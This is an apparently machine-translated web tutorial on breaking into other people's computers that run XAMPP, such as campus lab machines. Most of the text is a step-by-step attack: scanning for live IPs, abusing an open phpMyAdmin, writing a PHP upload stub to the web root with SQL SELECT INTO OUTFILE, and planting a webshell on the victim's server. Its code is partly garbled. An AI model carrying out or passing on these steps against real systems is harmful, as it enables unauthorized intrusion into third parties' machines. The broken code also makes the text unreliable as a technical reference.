
How to Hack Xampp – Currently there are many ways that you can use to hack other people’s computers.
One of them is by taking advantage of the gaps that exist in the Xampp program, what is Xampp?.
Xampp is a set of programs or programs that compile a number of programs related to the web, MySQL, Apache, Filezilla and many others.
There are several conditions and techniques needed, namely the target computer must be installed first in this program.
This is so that when you access the target’s IP you will be directly connected to the Xampp default page on the target computer.
But that doesn’t mean you can’t always use this method, because the possibility of this program being used by ordinary people is very small, because you have to choose a place.
As for places that may have Xampp programs, for example, such as campus labs, hotspot areas on campus, and many other places.
How to Hack Xampp
How to Hack Xampp Using Advanced IP Scanner and Webshell
After fulfilling some of the requirements above, then now you just have to prepare the tools to be used, including the following:
Webshell: (Can use anything, but in this article we are using bajax webshell).
1. The first step you have to do is install the “tools”Advanced IP Scanner” and do a scan using the tools to see which IPs are still active.

That means you can access the webserver owned by IP 10.165.118.110 directly.
But if the sign doesn’t appear, then you have to look for another IP because there is a very small possibility that it can be exploited.
But if you can’t, then you can look for other IPs that can be accessed.

4. Then to be able to create a database or use an existing database, then in the way to hack Xampp this time we will use an existing database, namely “college student“.
You only need to select one of the database lists in the phpmyadmin sidebar, after the database is selected, now you just have to use the “SQL” on the menubar.
If so, now you just need to create a table with the name “upload” and the file “codetab” by entering the sql command into the form field with the following command:
CREATE TABLE upload (codetab text);
If the command you entered in the field is accepted by the mysql, a table named “upload” will appear in the sidebar.

INSERT INTO upload (codetab) values (‘
php move_uploaded_file ($_FILES["shell"]["tmp_name"],$_FILES[shell"]["name"]; ?>‘);
If successful, then the way to hack Xampp will have the following display:
After manipulating the data to be entered in the table “upload” then the file will turn into a PHP file that you will access and use this file to upload the webshell that has been prepared.
While the commands that will be used to manipulate the data are as follows:
SELECT*INTO OUTFILE’C:/xampp/htdocs/upload.php’ from upload;
If in this step an error occurs, then sql will not be able to execute the command, so you have to change the output location of the command to the correct location.
The way to hack Xampp to find its Xampp location is to go back to the default xampp main page and select “phpinfo()” which is located on the sidebar on the page and look for info “Loaded Configuration File“.
After that look at the column on the right, if Xampp has been installed on the drive “EThen change the above command as follows:
SELECT* INTO OUTFILE ‘E”:/xampp/htdocs/upload.php’ from upload;
After the command runs well, then we will discuss the upload file created using the engineering results with the following address “https://10.165.118.110/upload.php” (victim’s IP and upload.php filename).
Then upload the prepared webshell file using bajax webshell.
Then upload the webshell again and we will access the webshell file using the address “https://10.165.118.110/bajax.php” (victim’s IP and webshell name).
If the webshell is successfully uploaded, then now you can access the file through a browser.
The final word
That’s information about how to hack with Xampp that we can share with you, and that method you can try to use.
With the above steps, you can manipulate the webshell, for example, such as renaming, downloading, or even deleting it.
Hopefully this method can increase your knowledge, especially in being careful when using public areas.
That’s our whole discussion in this article about how to hack Xampp 2022. Hopefully useful and good luck.